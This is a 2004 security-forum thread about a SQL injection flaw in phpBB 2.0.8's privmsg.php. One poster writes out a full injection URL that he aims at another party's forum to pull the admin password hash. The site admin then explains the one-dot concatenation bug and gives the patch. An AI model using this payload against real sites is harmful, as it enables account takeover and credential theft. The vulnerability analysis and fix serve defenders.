Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
April 18, 2024
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145

People Online:
Visitors: 481
Members: 0
Total: 481
PacketStorm News
·301 Moved Permanently

read more...
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> PhpNuke -> PHPBB 2.08 admin rights problem (newby)
Post new topic  Reply to topic View previous topic :: View next topic 
PHPBB 2.08 admin rights problem (newby)
PostPosted: Thu May 27, 2004 9:08 am Reply with quote
k_deda
Beginner
Beginner
 
Joined: May 27, 2004
Posts: 2




Hi all ,

Here is what I have done.

As other entries said.
1. I registered to the target forum.
2. Open mozilla browser
3. Type the adress bar, below adres
Code:

http://www.XXXXX.com/forum/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20username,null,user_password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,user_password%20FROM%20phpbb_users%20WHERE%20user_level=1%20LIMIT%201/*

4. This is the screen shot what I have get.

[img]
http://kafkas.europe.webmatrixhosting.net/phpbb.jpg
[/img]

Now where can I find the MD5 hash in this window?
What I am doing wrong.

PS : Dear Javek really thanks to your e-mail that show me the way to this forum. I am searching this subject for 2 weeks and I am almost getting mad.

Thanks in advance.
View user's profile Send private message Send e-mail
PostPosted: Thu May 27, 2004 9:18 am Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Seems, that this target is patched allready or has mysql version 3.x without UNION functionality enabled. Therefore traditional sploit is not working here...
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Thu May 27, 2004 9:42 am Reply with quote
k_deda
Beginner
Beginner
 
Joined: May 27, 2004
Posts: 2




Sad
At least I learned that, i am not a moron.

Thanks for your interest.

Please check your pm.

Regards
View user's profile Send private message Send e-mail
PostPosted: Wed Jun 02, 2004 6:07 am Reply with quote
Dionysus
Regular user
Regular user
 
Joined: Jun 02, 2004
Posts: 9




Hi,

So what is the patch for this...? I managed to message myself my MD5.. I need this closed..!!
View user's profile Send private message
PostPosted: Wed Jun 02, 2004 6:05 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Just install latest phpbb version, which is allready patched. Or change only the affected file.
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Wed Jun 02, 2004 8:20 pm Reply with quote
Dionysus
Regular user
Regular user
 
Joined: Jun 02, 2004
Posts: 9




Sorry waraxe - I have only caught the tail end of this - which file is affected? and which bit of code?
View user's profile Send private message
PostPosted: Wed Jun 02, 2004 9:29 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




I have advisory about this phpBB issue:

http://www.waraxe.us/?modname=sa&id=013

Affected file is "privmsg.php", problem is in this piece of code:

Code:

case 'sentbox':
            $l_box_name = $lang['Sentbox'];
            $pm_sql_user = "AND pm.privmsgs_from_userid =  " . $userdata['user_id'] . "
                AND pm.privmsgs_type = " . PRIVMSGS_SENT_MAIL;
            break;
case 'savebox':
            $l_box_name = $lang['Savebox'];
            $pm_sql_user .= "AND ( ( pm.privmsgs_to_userid = " . $userdata['user_id'] . "
                    AND pm.privmsgs_type = " . PRIVMSGS_SAVED_IN_MAIL . " )
                OR ( pm.privmsgs_from_userid = " . $userdata['user_id'] . "
                    AND pm.privmsgs_type = " . PRIVMSGS_SAVED_OUT_MAIL . " )
                )";
            break;
default:



As you can see, in case of "savebox" variable "$pm_sql_user" is
concatenated (thanks to additional dot, which is just typo, i think) and
because $pm_sql_user is not initialized anywhere, we can inject any data
to $pm_sql_user from GET, POST or COOKIE parameters.
So - the patch - simplest ever! Just delete that additional dot! So this code fragment should be as:

Code:

case 'sentbox':
            $l_box_name = $lang['Sentbox'];
            $pm_sql_user = "AND pm.privmsgs_from_userid =  " . $userdata['user_id'] . "
                AND pm.privmsgs_type = " . PRIVMSGS_SENT_MAIL;
            break;
case 'savebox':
            $l_box_name = $lang['Savebox'];
            $pm_sql_user = "AND ( ( pm.privmsgs_to_userid = " . $userdata['user_id'] . "
                    AND pm.privmsgs_type = " . PRIVMSGS_SAVED_IN_MAIL . " )
                OR ( pm.privmsgs_from_userid = " . $userdata['user_id'] . "
                    AND pm.privmsgs_type = " . PRIVMSGS_SAVED_OUT_MAIL . " )
                )";
            break;
default:



Good example, how much can mean just one additional dot Wink
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Wed Jun 02, 2004 11:45 pm Reply with quote
Dionysus
Regular user
Regular user
 
Joined: Jun 02, 2004
Posts: 9




Thanks.. patching now.. just one dot.. amazing!
View user's profile Send private message
PHPBB 2.08 admin rights problem (newby)
  www.waraxe.us Forum Index -> PhpNuke
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 1 of 1  

  
  
 Post new topic  Reply to topic  




Powered by phpBB © 2001-2008 phpBB Group






Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2020 Janek Vind "waraxe"
Page Generation: 0.171 Seconds